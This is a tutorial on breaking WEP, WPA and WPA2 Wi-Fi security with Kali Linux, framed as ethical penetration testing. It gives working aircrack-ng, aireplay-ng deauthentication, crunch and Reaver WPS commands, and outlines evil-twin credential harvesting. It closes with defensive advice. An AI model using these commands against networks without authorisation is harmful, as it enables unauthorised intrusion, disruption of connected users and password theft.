Cracking WEP/WPA/WPA2 Wireless Security with Kali Linux: A Comprehensive Guide

Introduction

Wireless networks have become a vital part of modern life, providing internet access for devices in homes, businesses, and public spaces. With this rise in wireless connectivity, the importance of securing Wi-Fi networks has also increased. However, despite advancements in wireless encryption standards, many networks remain vulnerable to attacks.

In this article, we’ll dive deep into the techniques used to crack WEP, WPA, and WPA2 encryptions using Kali Linux. This guide is strictly for ethical hacking and penetration testing—intended to help professionals assess and strengthen wireless network security.

1. Wireless Security Standards Overview

1.1 WEP (Wired Equivalent Privacy)

WEP was the original encryption protocol for 802.11 wireless networks. It uses RC4 stream cipher for confidentiality and CRC-32 for integrity. Despite its name, WEP has major vulnerabilities:

  • Weak IV (Initialization Vector) reuse.

  • Easily crackable keys.

  • Poor key management.

1.2 WPA (Wi-Fi Protected Access)

WPA was introduced as an interim replacement for WEP, using TKIP (Temporal Key Integrity Protocol) and a pre-shared key (PSK). Although stronger than WEP, WPA still has some vulnerabilities, particularly when weak passwords are used.

1.3 WPA2 (Wi-Fi Protected Access 2)

WPA2 introduced AES-based encryption with CCMP, which offers better security. However, weak passwords, vulnerable handshakes, and misconfigured routers can still lead to exploitation.

2. Tools Required

All tools discussed are included in Kali Linux, a Debian-based distribution designed for penetration testing.

  • Aircrack-ng: Suite for auditing wireless networks.

  • Airodump-ng: For capturing packets.

  • Aireplay-ng: For de-authentication attacks.

  • Reaver: For WPS attacks.

  • Wireshark: For traffic analysis.

  • Crunch: Wordlist generator for brute-force attacks.

3. Preparing Your Environment

  1. Kali Linux: Install on bare metal, a virtual machine, or boot from USB.

  2. Wi-Fi Adapter: Use a wireless adapter that supports monitor mode and packet injection (e.g., Alfa AWUS036NHA).

  3. Legal Permission: Only perform testing on networks you own or have explicit permission to test.

4. Cracking WEP

4.1 Packet Capturing

  1. Enable monitor mode:

bash

airmon-ng start wlan0

  1. Identify target:

bash

airodump-ng wlan0mon

  1. Focus on a specific network:

bash

airodump-ng --bssid <BSSID> -c <channel> -w wep_capture wlan0mon

4.2 Packet Injection

Use ARP injection to generate traffic:

bash

aireplay-ng -3 -b <BSSID> -h <your_MAC> wlan0mon

4.3 Cracking WEP Key

Once enough IVs are captured:

bash

aircrack-ng wep_capture-01.cap

If successful, the key will be displayed.

5. Cracking WPA/WPA2-PSK

5.1 Handshake Capture

Start monitoring:

bash

airodump-ng --bssid <BSSID> -c <channel> -w handshake wlan0mon

Send de-authentication packets:

bash

aireplay-ng --deauth 10 -a <BSSID> -c <client_MAC> wlan0mon

When the client reconnects, a handshake is captured.

5.2 Wordlist Attack

Use a dictionary attack with Aircrack-ng:

bash

aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

Success depends on password strength and wordlist quality.

5.3 Brute Force with Crunch

If the password pattern is known:

bash

crunch 8 8 abc123 -o mylist.txt
aircrack-ng -w mylist.txt handshake-01.cap

6. WPS Attack (for WPA/WPA2)

If WPS is enabled, use Reaver:

bash

reaver -i wlan0mon -b <BSSID> -c <channel> -vv

This brute-forces the WPS PIN to retrieve the WPA passphrase.

7. Bypassing WPA2-Enterprise (Advanced)

WPA2-Enterprise is harder to crack. One method involves setting up an evil twin access point to trick users into connecting and capturing credentials:

  • Tools: hostapd-wpe, FreeRADIUS, Eaphammer

  • Technique: Fake AP + Credential harvesting

8. Real-World Examples

Example 1: Cracking WEP in Under 5 Minutes

  • Capture 10,000+ IVs.

  • Use Aircrack-ng.

  • Key cracked successfully.

Example 2: WPA2 Handshake + RockYou Attack

  • Deauth a user.

  • Capture handshake.

  • Brute force with RockYou list.

  • Password found: ilovepizza123

9. Best Practices for Defense

  • Disable WEP and WPS.

  • Use strong WPA2 or WPA3 passwords.

  • Use 802.1x authentication for enterprise environments.

  • Regularly monitor networks for rogue APs.

  • Educate users on phishing and fake APs.

Conclusion

While WEP, WPA, and WPA2 offer various levels of protection for wireless networks, they can be compromised if improperly configured or if weak passwords are used. This guide shows how penetration testers and ethical hackers can use Kali Linux to assess and exploit these vulnerabilities in a legal and authorized environment.

The key takeaway is to understand how attackers operate in order to better defend networks against them. Always ensure that penetration testing is conducted ethically and within legal boundaries.